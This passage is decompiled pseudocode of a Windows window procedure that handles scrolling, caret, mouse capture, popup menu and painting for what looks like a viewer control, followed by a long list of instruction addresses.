						_t28 = _v16 + 0x4095b4; // 0x1f0f0b
						switch( *((intOrPtr*)(( *_t28 & 0x000000ff) * 4 +  &M00409580))) {
							case 0:
								__ecx = _v8;
								__eflags =  *(__ecx + 0x84);
								if( *(__ecx + 0x84) != 0) {
									__edx = _a12;
									_v92 = _a12;
									__eflags = _v92 - 0x101;
									if(_v92 == 0x101) {
										_v8 = E004024C0(_v8, 0);
										L157:
										goto L178;
									}
									__eflags = _v92 - 0x102;
									if(_v92 == 0x102) {
										__ecx = _v8;
										__eax = E004024C0(_v8, 1);
										goto L157;
									}
									__edx = _a16;
									__eax = _a12;
									__ecx = _a8;
									__edx = _a4;
									return DefWindowProcW(_a4, _a8, _a12, _a16);
								}
								goto L178;
							case 1:
								goto L15;
							case 2:
								__edx = _v8;
								__eax =  *(_v8 + 8);
								__ecx = _v8;
								__edx =  *(_v8 + 8);
								 *(0x78 +  *(_v8 + 8)) =  *(0x78 +  *(_v8 + 8)) -  *( *(_v8 + 8) + 0x70);
								__eax =  *(0x78 +  *(_v8 + 8)) -  *( *(_v8 + 8) + 0x70) + 1;
								_v32 =  *(0x78 +  *(_v8 + 8)) -  *( *(_v8 + 8) + 0x70) + 1;
								__ecx = _v8;
								__edx =  *(_v8 + 8);
								__eax =  *(__edx + 0x70);
								_v20 =  *(__edx + 0x70);
								__ecx = _v8;
								__eflags =  *(__ecx + 0x84);
								if( *(__ecx + 0x84) != 0) {
									_a12 = _a12 & 0x0000ffff;
									__eax = __dx & 0x0000ffff;
									_v60 = __dx & 0x0000ffff;
									__eflags = _v60 - 5;
									if(_v60 > 5) {
										L112:
										__eflags = _v20;
										if(_v20 <= 0) {
											_v64 = 0;
										} else {
											__edx = _v20;
											_v64 = _v20;
										}
										__eax = _v8;
										__ecx =  *(_v8 + 8);
										 *((intOrPtr*)(__ecx + 0xc)) =  *((intOrPtr*)(__ecx + 0xc)) - _v32;
										__eflags = _v64 -  *((intOrPtr*)(__ecx + 0xc)) - _v32;
										if(_v64 >=  *((intOrPtr*)(__ecx + 0xc)) - _v32) {
											__edx = _v8;
											__eax =  *(_v8 + 8);
											__ecx =  *(__eax + 0xc);
											__ecx =  *(__eax + 0xc) - _v32;
											__eflags = __ecx;
											_v72 = __ecx;
										} else {
											__eflags = _v20;
											if(_v20 <= 0) {
												_v68 = 0;
											} else {
												__eax = _v20;
												_v68 = _v20;
											}
											__ecx = _v68;
											_v72 = _v68;
										}
										__edx = _v72;
										_v20 = _v72;
										__eax = _v8;
										__ecx =  *(_v8 + 8);
										__edx = _v20;
										__eflags = _v20 -  *((intOrPtr*)(__ecx + 0x70));
										if(_v20 !=  *((intOrPtr*)(__ecx + 0x70))) {
											__eax = _v8;
											__ecx =  *(_v8 + 8);
											__edx = _v20;
											 *( *(_v8 + 8) + 0x70) = _v20;
											__eax = _v32;
											__ecx = _v20;
											_t377 = __eax - 1; // -1
											__edx = _v20 + _t377;
											__eax = _v8;
											__ecx =  *(_v8 + 8);
											 *(0x78 +  *(_v8 + 8)) = _v20 + _t377;
											__edx = _v8;
											__eax = E00407B50(_v8);
										}
										goto L178;
									}
									__ecx = _v60;
									switch( *((intOrPtr*)(_v60 * 4 +  &M004096B0))) {
										case 0:
											_v20 = _v20 - 1;
											_v20 = _v20 - 1;
											goto L112;
										case 1:
											_v20 = _v20 + 1;
											_v20 = _v20 + 1;
											goto L112;
										case 2:
											_v20 = _v20 - 8;
											_v20 = _v20 - 8;
											goto L112;
										case 3:
											_v20 = _v20 + 8;
											_v20 = _v20 + 8;
											goto L112;
										case 4:
											goto L112;
										case 5:
											_a12 = _a12 >> 0x10;
											__eax = _a12 >> 0x00000010 & 0x0000ffff;
											__eflags = _a12 >> 0x00000010 & 0x0000ffff;
											__ecx = __ax & 0x0000ffff;
											_v20 = __ax & 0x0000ffff;
											goto L112;
									}
								}
								goto L178;
							case 3:
								L126:
								__edx = _v8;
								__eax =  *(_v8 + 8);
								__ecx = _v8;
								__edx =  *(_v8 + 8);
								 *( *(_v8 + 8) + 0x7c) =  *( *(_v8 + 8) + 0x7c) -  *( *(_v8 + 8) + 0x74);
								__eax =  *( *(_v8 + 8) + 0x7c) -  *( *(_v8 + 8) + 0x74) + 1;
								_v36 =  *( *(_v8 + 8) + 0x7c) -  *( *(_v8 + 8) + 0x74) + 1;
								__ecx = _v8;
								__edx =  *(_v8 + 8);
								__eax =  *(__edx + 0x74);
								_v12 =  *(__edx + 0x74);
								__ecx = _v8;
								__eflags =  *(__ecx + 0x84);
								if( *(__ecx + 0x84) != 0) {
									__eflags = _a8 - 0x20a;
									if(_a8 != 0x20a) {
										_a12 = _a12 & 0x0000ffff;
										__ecx = __ax & 0x0000ffff;
										_v76 = __ax & 0x0000ffff;
										__eflags = _v76 - 5;
										if(_v76 > 5) {
											L137:
											__eflags = _v12;
											if(_v12 <= 0) {
												_v80 = 0;
											} else {
												__eax = _v12;
												_v80 = _v12;
											}
											__ecx = _v8;
											__edx =  *(_v8 + 8);
											 *((intOrPtr*)(__edx + 0x10)) =  *((intOrPtr*)(__edx + 0x10)) - _v36;
											__eflags = _v80 -  *((intOrPtr*)(__edx + 0x10)) - _v36;
											if(_v80 >=  *((intOrPtr*)(__edx + 0x10)) - _v36) {
												__eax = _v8;
												__ecx =  *(_v8 + 8);
												__edx =  *(__ecx + 0x10);
												__edx =  *(__ecx + 0x10) - _v36;
												__eflags = __edx;
												_v88 = __edx;
											} else {
												__eflags = _v12;
												if(_v12 <= 0) {
													_v84 = 0;
												} else {
													__ecx = _v12;
													_v84 = _v12;
												}
												__edx = _v84;
												_v88 = _v84;
											}
											__eax = _v88;
											_v12 = _v88;
											__ecx = _v8;
											__edx =  *(_v8 + 8);
											__eax = _v12;
											__eflags = _v12 -  *(__edx + 0x74);
											if(_v12 !=  *(__edx + 0x74)) {
												__ecx = _v8;
												__edx =  *(_v8 + 8);
												__eax = _v12;
												 *( *(_v8 + 8) + 0x74) = _v12;
												__ecx = _v36;
												__edx = _v12;
												_t470 = __ecx - 1; // -1
												__eax = _v12 + _t470;
												__ecx = _v8;
												__edx =  *(_v8 + 8);
												 *( *(_v8 + 8) + 0x7c) = _v12 + _t470;
												_v8 = E00407B50(_v8);
											}
											goto L178;
										}
										__edx = _v76;
										switch( *((intOrPtr*)(_v76 * 4 +  &M004096C8))) {
											case 0:
												_v12 = _v12 - 1;
												_v12 = _v12 - 1;
												goto L137;
											case 1:
												_v12 = _v12 + 1;
												_v12 = _v12 + 1;
												goto L137;
											case 2:
												_v12 = _v12 - 8;
												_v12 = _v12 - 8;
												goto L137;
											case 3:
												_v12 = _v12 + 8;
												_v12 = _v12 + 8;
												goto L137;
											case 4:
												goto L137;
											case 5:
												_a12 = _a12 >> 0x10;
												__ecx = _a12 >> 0x00000010 & 0x0000ffff;
												__eflags = _a12 >> 0x00000010 & 0x0000ffff;
												__edx = __cx & 0x0000ffff;
												_v12 = __cx & 0x0000ffff;
												goto L137;
										}
									}
									_v24 = 3;
									__edx =  &_v24;
									SystemParametersInfoW(0x68, 0,  &_v24, 0) = _a12;
									__eax = _a12 >> 0x10;
									__eax = _a12 >> 0x00000010 & 0x0000ffff;
									__ax = __eax;
									__eax =  ~__eax;
									asm("cdq");
									__ecx = 0x78;
									_t413 = __eax % 0x78;
									__eax = __eax / 0x78;
									__edx = _t413;
									_v24 = __eax;
									_v12 = _v12 + _v24;
									_v12 = _v12 + _v24;
									goto L137;
								}
								goto L178;
							case 4:
								__ecx = _v8;
								__eflags =  *(__ecx + 0x84);
								if( *(__ecx + 0x84) == 0) {
									L175:
									__ecx = _a16;
									__edx = _a12;
									__eax = _a8;
									__ecx = _a4;
									return DefWindowProcW(_a4, _a8, _a12, _a16);
								}
								_a16 = _a16 >> 0x10;
								__edx = _a16 >> 0x00000010 & 0x0000ffff;
								__eax = __dx & 0x0000ffff;
								__eflags = __dx & 0x0000ffff;
								if((__dx & 0x0000ffff) != 0) {
									__edx = _v8;
									 *(__edx + 0xa8) = GetSystemMenu( *(__edx + 0xa8), 0);
									__ecx = _v8;
									__eax = E00406910(_v8, __eax);
									goto L178;
								}
								goto L175;
							case 5:
								__edx = _v8;
								__eflags =  *(__edx + 0x84);
								if( *(__edx + 0x84) == 0) {
									L67:
									__edx = _a12;
									__eax = _a16;
									__ecx = _v8;
									__eax = E00403F70(_v8, _v8, _a16);
									__edx = _v8;
									__eax = E00405B90(__edi, _v8, __eax, _a12, 1);
									L68:
									goto L178;
								}
								__eax = _v8;
								__ecx =  *(_v8 + 0x84);
								__eflags =  *(__ecx + 0x2c);
								if( *(__ecx + 0x2c) != 0) {
									L62:
									__eax = GetCapture();
									__ecx = _v8;
									__eflags = __eax -  *((intOrPtr*)(__ecx + 0xa8));
									if(__eax ==  *((intOrPtr*)(__ecx + 0xa8))) {
										__edx = _v8;
										__eax =  *(_v8 + 0x84);
										__eflags =  *(__eax + 0x14);
										if( *(__eax + 0x14) != 0) {
											__ecx = _a12;
											__ecx = _a12 & 0x00000001;
											__eflags = __ecx;
											if(__ecx != 0) {
												__edx = _a16;
												__eax = _v8;
												_push(E00403F70(__ecx, _v8, _a16));
												__ecx = _v8;
												__edx =  *(_v8 + 0x84);
												__eax =  *(__edx + 0x18);
												_push( *(__edx + 0x18));
												__ecx = _v8;
												_push(_v8);
												__eax = E00404E90();
											}
										}
									}
									goto L68;
								}
								__edx = _v8;
								__eax =  *(_v8 + 0x84);
								__eflags =  *(__eax + 0x14);
								if( *(__eax + 0x14) == 0) {
									goto L67;
								}
								goto L62;
							case 6:
								__edx = _v8;
								__eflags =  *(__edx + 0x84);
								if( *(__edx + 0x84) == 0) {
									L57:
									__ecx = _a12;
									__edx = _a16;
									_v8 = E00403F70(_a12, _v8, _a16);
									__ecx = _v8;
									__eax = E00405B90(__edi, _v8, __eax, _v8, 0);
									L58:
									goto L178;
								}
								__eax = _v8;
								__ecx =  *(_v8 + 0x84);
								__eflags =  *(__ecx + 0x2c);
								if( *(__ecx + 0x2c) != 0) {
									L50:
									__ecx = _v8;
									__edx =  *(_v8 + 0x84);
									__eflags =  *( *(_v8 + 0x84) + 0x14);
									if(__eflags != 0) {
										_v8 = E00407A80(__eflags, _v8, 0);
									}
									__ecx = _v8;
									__edx =  *(_v8 + 0x84);
									__eflags =  *(__edx + 0x2c);
									if( *(__edx + 0x2c) == 0) {
										L55:
										__ecx = _a16;
										__edx = _v8;
										__eax = E00403F70(_a16, _v8, _a16);
										__ecx = _v8;
										__edx =  *(_v8 + 0x84);
										 *( *(_v8 + 0x84) + 0x1c) = __eax;
										__eax = _v8;
										__ecx =  *(_v8 + 0x84);
										__edx =  *( *(_v8 + 0x84) + 0x1c);
										__eax = _v8;
										__ecx =  *(_v8 + 0x84);
										 *( *(_v8 + 0x84) + 0x18) =  *( *(_v8 + 0x84) + 0x1c);
										__edx = _v8;
										 *(__edx + 0xa8) = SetCapture( *(__edx + 0xa8));
										__ecx = _v8;
										__eax = E00407A80(__eflags, _v8, 0);
										__edx = _v8;
										__eax =  *(_v8 + 0x84);
										 *( *(_v8 + 0x84) + 0x14) = 1;
										goto L56;
									} else {
										__eax = _v8;
										__ecx =  *(_v8 + 0x84);
										__eflags =  *(__ecx + 0x14);
										if( *(__ecx + 0x14) == 0) {
											goto L55;
										}
										__edx = _v8;
										__eax =  *(_v8 + 0x84);
										 *( *(_v8 + 0x84) + 0x14) = 0;
										L56:
										goto L58;
									}
								}
								__edx = _v8;
								__eax =  *(_v8 + 0x84);
								__eflags =  *(__eax + 0x14);
								if( *(__eax + 0x14) == 0) {
									goto L57;
								}
								goto L50;
							case 7:
								__eax = _v8;
								__eflags =  *(__eax + 0x84);
								if( *(__eax + 0x84) == 0) {
									L76:
									__edx = _a12;
									__eax = _a16;
									__ecx = _v8;
									__eax = E00403F70(_v8, _v8, _a16);
									__edx = _v8;
									__eax = E00405B90(__edi, _v8, __eax, _a12, 0);
									L77:
									goto L178;
								}
								__ecx = _v8;
								__edx =  *(_v8 + 0x84);
								__eflags =  *(__edx + 0x2c);
								if( *(__edx + 0x2c) != 0) {
									L72:
									__eax = GetCapture();
									__edx = _v8;
									__eflags = __eax -  *(__edx + 0xa8);
									if(__eax ==  *(__edx + 0xa8)) {
										__eax = _v8;
										__ecx =  *(_v8 + 0x84);
										__eflags =  *(__ecx + 0x14);
										if( *(__ecx + 0x14) != 0) {
											__edx = _a16;
											__eax = _v8;
											_push(E00403F70(__ecx, _v8, _a16));
											__ecx = _v8;
											__edx =  *(_v8 + 0x84);
											__eax =  *(__edx + 0x18);
											_push( *(__edx + 0x18));
											__ecx = _v8;
											_push(_v8);
											E00404E90() = ReleaseCapture();
										}
									}
									goto L77;
								}
								__eax = _v8;
								__ecx =  *(_v8 + 0x84);
								__eflags =  *(__ecx + 0x14);
								if( *(__ecx + 0x14) == 0) {
									goto L76;
								}
								goto L72;
							case 8:
								__ecx = _a12;
								__edx = _a16;
								_v8 = E00403F70(_a12, _v8, _a16);
								__ecx = _v8;
								__eax = E00405B90(__edi, _v8, __eax, _v8, 2);
								goto L178;
							case 9:
								__eax = _v8;
								__eflags =  *(__eax + 0x84);
								if( *(__eax + 0x84) == 0) {
									L81:
									__edx = _a12;
									__eax = _a16;
									__ecx = _v8;
									__eax = E00403F70(_v8, _v8, _a16);
									__edx = _v8;
									__eax = E00405B90(__edi, _v8, __eax, _a12, 0);
									L82:
									goto L178;
								}
								_a12 = _a12 & 0x0000000c;
								__edx = _v8;
								__eax =  *(_v8 + 0x84);
								__eflags = (_a12 & 0x0000000c) -  *((intOrPtr*)(__eax + 0x30));
								if((_a12 & 0x0000000c) !=  *((intOrPtr*)(__eax + 0x30))) {
									goto L81;
								}
								_a16 = _a16 & 0x0000ffff;
								__edx = __cx;
								_v100.x = __cx;
								_a16 = _a16 >> 0x10;
								__eax = _a16 >> 0x00000010 & 0x0000ffff;
								__ecx = __ax;
								_v100.y = __ax;
								__edx =  &_v100;
								_a4 = ClientToScreen(_a4,  &_v100);
								__ecx = _v8;
								__edx =  *(_v8 + 0x84);
								__eax =  *( *(_v8 + 0x84) + 0xc);
								__ecx = _v8;
								__eax = E00406910(_v8,  *( *(_v8 + 0x84) + 0xc));
								__edx = _a4;
								__eax = _v100.y;
								__ecx = _v100.x;
								__edx = _v8;
								__eax =  *(_v8 + 0x84);
								__ecx =  *(__eax + 0xc);
								__eax = TrackPopupMenu( *(__eax + 0xc), 2, _v100.x, _v100.y, 0, _a4, 0);
								goto L82;
							case 0xa:
								__eax = _a12;
								__ecx = _a16;
								__edx = _v8;
								E00403F70(_a16, _v8, _a16) = _v8;
								__eax = E00405B90(__edi, _v8, _v8, _a12, 0);
								goto L178;
							case 0xb:
								__eax = _v8;
								__ecx =  *(_v8 + 8);
								__edx = _v8;
								__eax =  *(_v8 + 8);
								_v8 =  *(_v8 + 8);
								 *( *(_v8 + 8) + 0x7c) =  *( *(_v8 + 8) + 0x7c) -  *( *(_v8 + 8) + 0x74);
								__eax =  *( *(_v8 + 8) + 0x7c) -  *( *(_v8 + 8) + 0x74) + 1;
								__eflags =  *(__ecx + 0x10) - __eax;
								if( *(__ecx + 0x10) > __eax) {
									goto L126;
								}
								__ecx = _a12;
								__edx = _a16;
								_v8 = E00403F70(_a12, _v8, _a16);
								__ecx = _v8;
								__eax = E00405B90(__edi, _v8, __eax, _v8, 4);
								goto L178;
							case 0xc:
								goto L177;
						}
					}
					if(_v16 == 0x111) {
						_t573 = _v8;
						__eflags =  *(_t573 + 0x84);
						if( *(_t573 + 0x84) != 0) {
							_v28 = _a12;
							_v28 = _v28 - 0x101;
							__eflags = _v28 - 0x14;
							if(__eflags > 0) {
								L171:
								return DefWindowProcW(_a4, _a8, _a12, _a16);
							}
							_t495 = _v28 + 0x409700; // 0xcccccc06
							switch( *((intOrPtr*)(( *_t495 & 0x000000ff) * 4 +  &M004096E0))) {
								case 0:
									E004024C0(_v8, 0);
									goto L172;
								case 1:
									_v8 = E004024C0(_v8, 1);
									goto L172;
								case 2:
									__ecx = _v8;
									__edx =  *(_v8 + 0x84);
									__eax = 0;
									 *( *(_v8 + 0x84) + 0x1a) = __ax;
									__ecx = _v8;
									__edx =  *(_v8 + 0x84);
									__eax = 0;
									 *( *(_v8 + 0x84) + 0x18) = __ax;
									__ecx = _v8;
									__edx =  *(_v8 + 0x84);
									__eax = 0;
									 *( *(_v8 + 0x84) + 0x1e) = __ax;
									__ecx = _v8;
									__edx =  *(_v8 + 0x84);
									__eax = 0;
									 *( *(_v8 + 0x84) + 0x1c) = __ax;
									__ecx = _v8;
									__eax = E00407A80(__eflags, _v8, 0);
									__edx = _v8;
									__eax =  *(_v8 + 0x84);
									 *( *(_v8 + 0x84) + 0x14) = 1;
									goto L172;
								case 3:
									__ecx = _v8;
									__edx =  *(_v8 + 0x84);
									__eflags =  *( *(_v8 + 0x84) + 0x14);
									if(__eflags != 0) {
										__eax = _v8;
										__ecx =  *(_v8 + 0x84);
										 *( *(_v8 + 0x84) + 0x14) = 0;
										__edx = _v8;
										E00407A80(__eflags, _v8, 0) = _v8;
										__eax = E00402740(_v8);
									}
									goto L172;
								case 4:
									__ecx = _v8;
									__eax = E004050C0(_v8);
									goto L172;
								case 5:
									__edx = _v8;
									__eax =  *(_v8 + 0x84);
									__ecx = 0;
									 *( *(_v8 + 0x84) + 0x1a) = __cx;
									__edx = _v8;
									__eax =  *(_v8 + 0x84);
									__ecx = 0;
									 *( *(_v8 + 0x84) + 0x18) = __cx;
									__edx = _v8;
									__eax =  *(_v8 + 8);
									 *(__eax + 0xc) =  *(__eax + 0xc) - 1;
									__edx = _v8;
									__eax =  *(_v8 + 0x84);
									 *( *(_v8 + 0x84) + 0x1c) = __cx;
									__ecx = _v8;
									__edx =  *(_v8 + 8);
									 *((intOrPtr*)(__edx + 0x10)) =  *((intOrPtr*)(__edx + 0x10)) - 1;
									__ecx = _v8;
									__edx =  *(_v8 + 0x84);
									 *( *(_v8 + 0x84) + 0x1e) = __ax;
									_v8 = E00407A80(__eflags, _v8, 0);
									__ecx = _v8;
									__edx =  *(_v8 + 0x84);
									 *( *(_v8 + 0x84) + 0x14) = 1;
									goto L172;
								case 6:
									L172:
									goto L178;
								case 7:
									goto L171;
							}
						}
						goto L178;
					}
					_v16 = _v16 - 0x18;
					if(_v16 > 0xed) {
						goto L177;
					}
					_t19 = _v16 + 0x409490; // 0xfd906602
					switch( *((intOrPtr*)(( *_t19 & 0x000000ff) * 4 +  &M00409480))) {
						case 0:
							__edx = _v8;
							__eflags =  *(__edx + 0x84);
							if( *(__edx + 0x84) != 0) {
								__eflags = _a12;
								if(_a12 == 0) {
									__ecx = _v8;
									__edx =  *(_v8 + 0x84);
									__eflags =  *(__edx + 4);
									if( *(__edx + 4) != 0) {
										__eax = _v8;
										__ecx =  *(_v8 + 0x84);
										__edx =  *(__ecx + 4);
										__eax = DeleteObject( *(__ecx + 4));
									}
									__eax = _v8;
									__ecx =  *(_v8 + 0x84);
									 *( *(_v8 + 0x84) + 4) = 0;
								} else {
									_v8 = E00407B50(_v8);
								}
							}
							goto L178;
						case 1:
							__edx = _v8;
							__eflags =  *(__edx + 0x84);
							if( *(__edx + 0x84) == 0) {
								L38:
								__eflags = _a8 - 0x100;
								if(__eflags != 0) {
									_v44 = 0;
								} else {
									_v44 = 1;
								}
								__eax = _a16;
								__ecx = _a12;
								__edx = _v44;
								_v8 = E00405A90(__edi, __eflags, _v8, _v44, _a12, _a16);
								L42:
								goto L178;
							}
							__eax = _v8;
							__ecx =  *(_v8 + 0x84);
							__eflags =  *(__ecx + 0x14);
							if( *(__ecx + 0x14) == 0) {
								goto L38;
							}
							__eflags = _a8 - 0x100;
							if(_a8 != 0x100) {
								_v40 = 0;
							} else {
								_v40 = 1;
							}
							__edx = _a16;
							_push(_a16);
							__eax = _a12;
							__ecx = _v40;
							__edx = _v8;
							__eax = E00404300(_a12, _v40, _v8, _v40, _a12);
							goto L42;
						case 2:
							__eflags = _a8 - 0x104;
							if(__eflags != 0) {
								_v48 = 0;
							} else {
								_v48 = 1;
							}
							__ecx = _a16;
							__edx = _a12;
							__eax = _v48;
							__ecx = _v8;
							__eax = E00405A90(__edi, __eflags, _v8, _v48, _a12, _a16);
							goto L178;
						case 3:
							goto L177;
					}
				}
				if(_v16 == 0xf) {
					_t637 = _v8;
					__eflags =  *(_t637 + 0x84);
					if( *(_t637 + 0x84) != 0) {
						BeginPaint( *(_v8 + 0xa8),  &_v164);
						BitBlt(_v164.hdc, 0, 0, ( *(0x78 +  *(_v8 + 8)) -  *( *(_v8 + 8) + 0x70) + 1) *  *( *(_v8 + 8) + 0x80), ( *( *(_v8 + 8) + 0x7c) -  *( *(_v8 + 8) + 0x74) + 1) *  *( *(_v8 + 8) + 0x82),  *( *(_v8 + 0x84)),  *( *(_v8 + 8) + 0x80) *  *( *(_v8 + 8) + 0x70),  *( *(_v8 + 8) + 0x82) *  *( *(_v8 + 8) + 0x74), 0xcc0020);
						__eflags =  *( *(_v8 + 0x84) + 0x14);
						if(__eflags != 0) {
							E00407A80(__eflags, _v8, _v164);
						}
						EndPaint( *(_v8 + 0xa8),  &_v164);
					}
					goto L178;
				}
				_v16 = _v16 - 1;
				if(_v16 > 7) {
					goto L177;
				}
				switch( *((intOrPtr*)(_v16 * 4 +  &M00409460))) {
					case 0:
						__ecx = _a16;
						__edx = _a4;
						return E004086E0(_a4, _a16);
					case 1:
						__eax = _v8;
						 *(_v8 + 0xa8) = 0;
						PostQuitMessage(0);
						goto L178;
					case 2:
						goto L177;
					case 3:
						__edx = _v8;
						__eflags =  *(__edx + 0x84);
						if( *(__edx + 0x84) != 0) {
							__eax = _v8;
							__ecx =  *(_v8 + 0x84);
							__eflags =  *((intOrPtr*)(__ecx + 0x64)) - 2;
							if( *((intOrPtr*)(__ecx + 0x64)) != 2) {
								_a16 = _a16 >> 0x10;
								__edx = _a16 >> 0x00000010 & 0x0000ffff;
								__eax = __dx & 0x0000ffff;
								__ecx = _v8;
								__edx =  *(_v8 + 8);
								__ecx =  *( *(_v8 + 8) + 0x82);
								asm("cdq");
								_t281 = __eax % __ecx;
								__eax = __eax / __ecx;
								__edx = _t281;
								__eflags = __eax - 0x14;
								if(__eax <= 0x14) {
									_v52 = 0x14;
								} else {
									_a16 = _a16 >> 0x10;
									__edx = _a16 >> 0x00000010 & 0x0000ffff;
									__eax = __dx & 0x0000ffff;
									__ecx = _v8;
									__edx =  *(_v8 + 8);
									__ecx =  *( *(_v8 + 8) + 0x82);
									asm("cdq");
									_t289 = __eax % __ecx;
									__eax = __eax / __ecx;
									__edx = _t289;
									_v52 = __eax;
								}
								_a16 = _a16 & 0x0000ffff;
								__eax = __dx & 0x0000ffff;
								__ecx = _v8;
								__edx =  *(_v8 + 8);
								__ecx =  *( *(_v8 + 8) + 0x80);
								asm("cdq");
								_t299 = __eax % __ecx;
								__eax = __eax / __ecx;
								__edx = _t299;
								__eflags = __eax - 0x14;
								if(__eflags <= 0) {
									_v56 = 0x14;
								} else {
									_a16 = _a16 & 0x0000ffff;
									__eax = __dx & 0x0000ffff;
									__ecx = _v8;
									__edx =  *(_v8 + 8);
									__ecx =  *( *(_v8 + 8) + 0x80);
									asm("cdq");
									_t307 = __eax % __ecx;
									__eax = __eax / __ecx;
									__edx = _t307;
									_v56 = __eax;
								}
								__edx = _v52;
								__eax = _v56;
								__ecx = _v8;
								__eax = E00405C60(__eflags, _v8, _v56, _v52);
							}
						}
						goto L178;
					case 4:
						__edx = _v8;
						__eflags =  *(__edx + 0x84);
						if( *(__edx + 0x84) != 0) {
							__eax = _v8;
							__ecx =  *(_v8 + 8);
							__eflags =  *(__ecx + 0x18);
							if( *(__ecx + 0x18) != 0) {
								__edx = _v8;
								__eax =  *(_v8 + 8);
								__ecx =  *( *(_v8 + 8) + 0x82);
								__edx = _v8;
								__eax =  *(_v8 + 8);
								__ecx =  *( *(_v8 + 8) + 0x80);
								__edx = _v8;
								__eax =  *(_v8 + 0x84);
								__ecx =  *( *(_v8 + 0x84) + 0x10);
								__edx = _v8;
								 *(__edx + 0xa8) = CreateCaret( *(__edx + 0xa8),  *( *(_v8 + 0x84) + 0x10),  *( *(_v8 + 8) + 0x80),  *( *(_v8 + 8) + 0x82));
								__ecx = _v8;
								__eax = E004083F0(_v8);
							}
						}
						goto L178;
					case 5:
						__edx = _v8;
						__eflags =  *(__edx + 0x84);
						if( *(__edx + 0x84) != 0) {
							__eax = _v8;
							__ecx =  *(_v8 + 8);
							__eflags =  *(__ecx + 0x18);
							if( *(__ecx + 0x18) != 0) {
								__eax = DestroyCaret();
							}
						}
						goto L178;
				}
			}































                                                  0x004087a5
                                                  0x004087ab
                                                  0x004087b2
                                                  0x004087e2
                                                  0x0040881f
                                                  0x00409440
                                                  0x00000000
                                                  0x00409450
                                                  0x00408828
                                                  0x00408885
                                                  0x00408885
                                                  0x00408888
                                                  0x0040888f
                                                  0x00408894
                                                  0x0040889a
                                                  0x0040889e
                                                  0x004088a4
                                                  0x004088a4
                                                  0x0040889e
                                                  0x00409458
                                                  0x00409458
                                                  0x00000000
                                                  0x00409458
                                                  0x00408833
                                                  0x0040883d
                                                  0x00000000
                                                  0x00000000
                                                  0x00408846
                                                  0x0040884d
                                                  0x00000000
                                                  0x004091fd
                                                  0x00409200
                                                  0x00409207
                                                  0x0040920e
                                                  0x00409211
                                                  0x00409214
                                                  0x0040921b
                                                  0x0040922e
                                                  0x0040925d
                                                  0x00000000
                                                  0x0040925d
                                                  0x0040921d
                                                  0x00409224
                                                  0x00409237
                                                  0x0040923b
                                                  0x00000000
                                                  0x0040923b
                                                  0x00409242
                                                  0x00409246
                                                  0x0040924a
                                                  0x0040924e
                                                  0x00000000
                                                  0x00409252
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00408f2b
                                                  0x00408f2e
                                                  0x00408f31
                                                  0x00408f34
                                                  0x00408f3a
                                                  0x00408f3d
                                                  0x00408f40
                                                  0x00408f43
                                                  0x00408f46
                                                  0x00408f49
                                                  0x00408f4c
                                                  0x00408f4f
                                                  0x00408f52
                                                  0x00408f59
                                                  0x00408f63
                                                  0x00408f69
                                                  0x00408f6c
                                                  0x00408f6f
                                                  0x00408f73
                                                  0x00408fbc
                                                  0x00408fbc
                                                  0x00408fc0
                                                  0x00408fca
                                                  0x00408fc2
                                                  0x00408fc2
                                                  0x00408fc5
                                                  0x00408fc5
                                                  0x00408fd1
                                                  0x00408fd4
                                                  0x00408fda
                                                  0x00408fdd
                                                  0x00408fe0
                                                  0x00408fff
                                                  0x00409002
                                                  0x00409005
                                                  0x00409008
                                                  0x00409008
                                                  0x0040900b
                                                  0x00408fe2
                                                  0x00408fe2
                                                  0x00408fe6
                                                  0x00408ff0
                                                  0x00408fe8
                                                  0x00408fe8
                                                  0x00408feb
                                                  0x00408feb
                                                  0x00408ff7
                                                  0x00408ffa
                                                  0x00408ffa
                                                  0x0040900e
                                                  0x00409011
                                                  0x00409014
                                                  0x00409017
                                                  0x0040901a
                                                  0x0040901d
                                                  0x00409020
                                                  0x00409022
                                                  0x00409025
                                                  0x00409028
                                                  0x0040902b
                                                  0x0040902e
                                                  0x00409031
                                                  0x00409034
                                                  0x00409034
                                                  0x00409038
                                                  0x0040903b
                                                  0x0040903e
                                                  0x00409041
                                                  0x00409045
                                                  0x00409045
                                                  0x00000000
                                                  0x0040904a
                                                  0x00408f75
                                                  0x00408f78
                                                  0x00000000
                                                  0x00408f98
                                                  0x00408f9b
                                                  0x00000000
                                                  0x00000000
                                                  0x00408fa3
                                                  0x00408fa6
                                                  0x00000000
                                                  0x00000000
                                                  0x00408f82
                                                  0x00408f85
                                                  0x00000000
                                                  0x00000000
                                                  0x00408f8d
                                                  0x00408f90
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00408fae
                                                  0x00408fb1
                                                  0x00408fb1
                                                  0x00408fb6
                                                  0x00408fb9
                                                  0x00000000
                                                  0x00000000
                                                  0x00408f78
                                                  0x00000000
                                                  0x00000000
                                                  0x00409091
                                                  0x00409091
                                                  0x00409094
                                                  0x00409097
                                                  0x0040909a
                                                  0x004090a0
                                                  0x004090a3
                                                  0x004090a6
                                                  0x004090a9
                                                  0x004090ac
                                                  0x004090af
                                                  0x004090b2
                                                  0x004090b5
                                                  0x004090b8
                                                  0x004090bf
                                                  0x004090c6
                                                  0x004090cd
                                                  0x00409111
                                                  0x00409116
                                                  0x00409119
                                                  0x0040911c
                                                  0x00409120
                                                  0x0040916a
                                                  0x0040916a
                                                  0x0040916e
                                                  0x00409178
                                                  0x00409170
                                                  0x00409170
                                                  0x00409173
                                                  0x00409173
                                                  0x0040917f
                                                  0x00409182
                                                  0x00409188
                                                  0x0040918b
                                                  0x0040918e
                                                  0x004091ad
                                                  0x004091b0
                                                  0x004091b3
                                                  0x004091b6
                                                  0x004091b6
                                                  0x004091b9
                                                  0x00409190
                                                  0x00409190
                                                  0x00409194
                                                  0x0040919e
                                                  0x00409196
                                                  0x00409196
                                                  0x00409199
                                                  0x00409199
                                                  0x004091a5
                                                  0x004091a8
                                                  0x004091a8
                                                  0x004091bc
                                                  0x004091bf
                                                  0x004091c2
                                                  0x004091c5
                                                  0x004091c8
                                                  0x004091cb
                                                  0x004091ce
                                                  0x004091d0
                                                  0x004091d3
                                                  0x004091d6
                                                  0x004091d9
                                                  0x004091dc
                                                  0x004091df
                                                  0x004091e2
                                                  0x004091e2
                                                  0x004091e6
                                                  0x004091e9
                                                  0x004091ec
                                                  0x004091f3
                                                  0x004091f3
                                                  0x00000000
                                                  0x004091f8
                                                  0x00409122
                                                  0x00409125
                                                  0x00000000
                                                  0x00409145
                                                  0x00409148
